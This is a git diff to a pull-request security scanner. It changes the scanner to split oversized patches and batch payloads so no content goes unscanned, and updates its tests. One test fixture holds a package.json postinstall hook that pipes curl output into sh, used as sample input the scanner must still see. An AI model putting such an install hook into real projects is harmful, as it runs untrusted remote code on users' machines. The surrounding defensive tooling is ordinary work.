diff --git a/.flue/agents/pr-scan.ts b/.flue/agents/pr-scan.ts index ce99db9..a6f9627 100644 --- a/.flue/agents/pr-scan.ts +++ b/.flue/agents/pr-scan.ts @@ -46,12 +46,18 @@ type PrScanPayload = { headRef?: string; headRepo?: string; }; + scan?: { + batch?: number; + batches?: number; + }; files?: Array<{ path: string; previousPath?: string; status: string; additions?: number; deletions?: number; + patchPart?: number; + patchParts?: number; patch?: string; }>; }; @@ -129,6 +135,8 @@ async function scanCiCdWorkflows( workflows: workflowFiles.map((file) => ({ path: file.path, status: file.status, + patchPart: file.patchPart, + patchParts: file.patchParts, patch: file.patch ?? "", })), }, @@ -167,6 +175,7 @@ Do not flag ordinary refactors, formatting, harmless dependency updates, or expe Repository: ${pr.owner ?? ""}/${pr.repo ?? ""} PR: #${pr.prNumber ?? ""} +Scan batch: ${pr.scan?.batch ?? 1} of ${pr.scan?.batches ?? 1} Title: ${pr.pullRequest?.title ?? ""} Author: ${pr.pullRequest?.author ?? ""} Base: ${pr.pullRequest?.baseRef ?? ""} @@ -178,6 +187,7 @@ CI/CD skill findings: ${JSON.stringify(ciCdFindings, null, 2)} Changed files and patches: +Large patches may appear as multiple records with the same path and patchPart/patchParts metadata. These parts are contiguous. Scan every part; no patch content has been omitted. ${JSON.stringify(pr.files, null, 2)} `; } diff --git a/src/services/__tests__/prScanner.test.ts b/src/services/__tests__/prScanner.test.ts index ee891b1..8d8b19f 100644 --- a/src/services/__tests__/prScanner.test.ts +++ b/src/services/__tests__/prScanner.test.ts @@ -134,7 +134,7 @@ describe("scanPrLocally", () => { expect(result.findings?.[0]?.file).toBe("package.json"); }); - it("returns an error result when a file patch exceeds the per-file scan limit", async () => { + it("splits a file patch that exceeds the per-file scan limit without omitting content", async () => { const oversizedPatch = `${"a".repeat(8_000)}\n+"postinstall": "curl https://example.com | sh"`; const fetchMock = vi .fn() @@ -148,18 +148,32 @@ describe("scanPrLocally", () => { changes: 1, patch: oversizedPatch, }, - ])); + ])) + .mockResolvedValueOnce(jsonResponse({ findings: [] })); vi.stubGlobal("fetch", fetchMock); const result = await scanPrLocally("acme", "repo", 12); - expect(result.error).toBe( - "PR patch for package.json exceeds the 8000 character per-file scan limit", - ); - expect(fetchMock).toHaveBeenCalledTimes(2); + expect(result).toEqual({ findings: [] }); + expect(fetchMock).toHaveBeenCalledTimes(3); + + const body = JSON.parse(fetchMock.mock.calls[2][1].body); + expect(body.files).toHaveLength(2); + expect(body.files[0]).toMatchObject({ + path: "package.json", + patchPart: 1, + patchParts: 2, + }); + expect(body.files[1]).toMatchObject({ + path: "package.json", + patchPart: 2, + patchParts: 2, + patch: expect.stringContaining('"postinstall": "curl https://example.com | sh"'), + }); + expect(body.files.map((file: { patch: string }) => file.patch).join("")).toBe(oversizedPatch); }); - it("returns an error result when total patch payload exceeds the scan limit", async () => { + it("scans all patch content across multiple Flue batches", async () => { const files = Array.from({ length: 13 }, (_, index) => ({ filename: `file-${index}.txt`, status: "modified", @@ -171,15 +185,51 @@ describe("scanPrLocally", () => { const fetchMock = vi .fn() .mockResolvedValueOnce(jsonResponse({ title: "Update build", body: "", user: { login: "octocat" } })) - .mockResolvedValueOnce(jsonResponse(files)); + .mockResolvedValueOnce(jsonResponse(files)) + .mockResolvedValueOnce(jsonResponse({ + findings: [ + { + category: "malicious_intent", + severity: "medium", + title: "First batch finding", + file: "file-0.txt", + evidence: "Suspicious content in first batch.", + recommendation: "Review the first batch.", + }, + ], + })) + .mockResolvedValueOnce(jsonResponse({ + findings: [ + { + category: "malicious_intent", + severity: "medium", + title: "Second batch finding", + file: "file-12.txt", + evidence: "Suspicious content in second batch.", + recommendation: "Review the second batch.", + }, + ], + })); vi.stubGlobal("fetch", fetchMock); const result = await scanPrLocally("acme", "repo", 12); - expect(result.error).toBe( - "Total PR patch payload exceeds the 100000 character scan limit before fully scanning file-12.txt", + expect(fetchMock).toHaveBeenCalledWith( + "http://127.0.0.1:3583/agents/pr-scan/acme-repo-12-batch-1-of-2", + expect.objectContaining({ method: "POST" }), + ); + expect(fetchMock).toHaveBeenCalledWith( + "http://127.0.0.1:3583/agents/pr-scan/acme-repo-12-batch-2-of-2", + expect.objectContaining({ method: "POST" }), ); - expect(fetchMock).toHaveBeenCalledTimes(2); + const firstBatchBody = JSON.parse(fetchMock.mock.calls[2][1].body); + const secondBatchBody = JSON.parse(fetchMock.mock.calls[3][1].body); + expect(firstBatchBody.files).toHaveLength(12); + expect(secondBatchBody.files).toHaveLength(1); + expect(result.findings?.map((finding) => finding.title)).toEqual([ + "First batch finding", + "Second batch finding", + ]); }); it("returns an inconclusive error result when Flue fails", async () => { diff --git a/src/services/prScanner.ts b/src/services/prScanner.ts index 9a4fba4..7223aa6 100644 --- a/src/services/prScanner.ts +++ b/src/services/prScanner.ts @@ -38,6 +38,10 @@ interface PrScanPayload { headSha: string; headRepo: string; }; + scan?: { + batch: number; + batches: number; + }; files: Array<{ path: string; previousPath?: string; @@ -45,6 +49,8 @@ interface PrScanPayload { additions: number; deletions: number; changes: number; + patchPart?: number; + patchParts?: number; patch: string; }>; } @@ -64,7 +70,7 @@ export async function scanPrLocally( try { const payload = await collectPrScanPayload(owner, repo, prNumber, options.githubToken); - const result = await runFluePrScan(payload); + const result = await runFluePrScans(payload); log.info({ findings: result.findings?.length ?? 0 }, "Local Flue PR scan completed"); return result; } catch (err) { @@ -150,36 +156,84 @@ async function fetchGitHub(pathAndQuery: string, githubToken?: string): Promi } function buildPayloadFiles(files: GitHubPrFile[]): PrScanPayload["files"] { - let remaining = MAX_PAYLOAD_CHARS; - return files.map((file) => { - const rawPatch = file.patch ?? ""; - if (rawPatch.length > MAX_PATCH_CHARS_PER_FILE) { - throw new Error( - `PR patch for ${file.filename} exceeds the ${MAX_PATCH_CHARS_PER_FILE} character per-file scan limit`, - ); - } - if (rawPatch.length > remaining) { - throw new Error( - `Total PR patch payload exceeds the ${MAX_PAYLOAD_CHARS} character scan limit before fully scanning ${file.filename}`, - ); - } - remaining -= rawPatch.length; + return files.flatMap((file) => { + const patchChunks = splitPatch(file.patch ?? "", MAX_PATCH_CHARS_PER_FILE); - return { + return patchChunks.map((patch, index) => ({ path: file.filename, previousPath: file.previous_filename, status: file.status, additions: file.additions ?? 0, deletions: file.deletions ?? 0, changes: file.changes ?? 0, - patch: rawPatch, - }; + patchPart: patchChunks.length > 1 ? index + 1 : undefined, + patchParts: patchChunks.length > 1 ? patchChunks.length : undefined, + patch, + })); }); } +function splitPatch(patch: string, maxChars: number): string[] { + if (patch.length <= maxChars) return [patch]; + + const chunks: string[] = []; + for (let offset = 0; offset < patch.length; offset += maxChars) { + chunks.push(patch.slice(offset, offset + maxChars)); + } + return chunks; +} + +async function runFluePrScans(payload: PrScanPayload): Promise { + const findings: PrFinding[] = []; + + for (const batch of buildPayloadBatches(payload)) { + const result = await runFluePrScan(batch); + if (result.error) return { error: result.error }; + findings.push(...(result.findings ?? [])); + } + + return { findings }; +} + +function buildPayloadBatches(payload: PrScanPayload): PrScanPayload[] { + if (!payload.files.length) return [payload]; + + const fileBatches: PrScanPayload["files"][] = []; + let currentBatch: PrScanPayload["files"] = []; + let currentPatchChars = 0; + + for (const file of payload.files) { + if ( + currentBatch.length > 0 + && currentPatchChars + file.patch.length > MAX_PAYLOAD_CHARS + ) { + fileBatches.push(currentBatch); + currentBatch = []; + currentPatchChars = 0; + } + + currentBatch.push(file); + currentPatchChars += file.patch.length; + } + + if (currentBatch.length > 0) fileBatches.push(currentBatch); + + return fileBatches.map((files, index) => ({ + ...payload, + scan: { + batch: index + 1, + batches: fileBatches.length, + }, + files, + })); +} + async function runFluePrScan(payload: PrScanPayload): Promise { const baseUrl = process.env.FLUE_BASE_URL ?? "http://127.0.0.1:3583"; - const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}`); + const batchSuffix = payload.scan && payload.scan.batches > 1 + ? `-batch-${payload.scan.batch}-of-${payload.scan.batches}` + : ""; + const agentId = encodeURIComponent(`${payload.owner}-${payload.repo}-${payload.prNumber}${batchSuffix}`); const res = await fetch(`${baseUrl}/agents/pr-scan/${agentId}`, { method: "POST", headers: {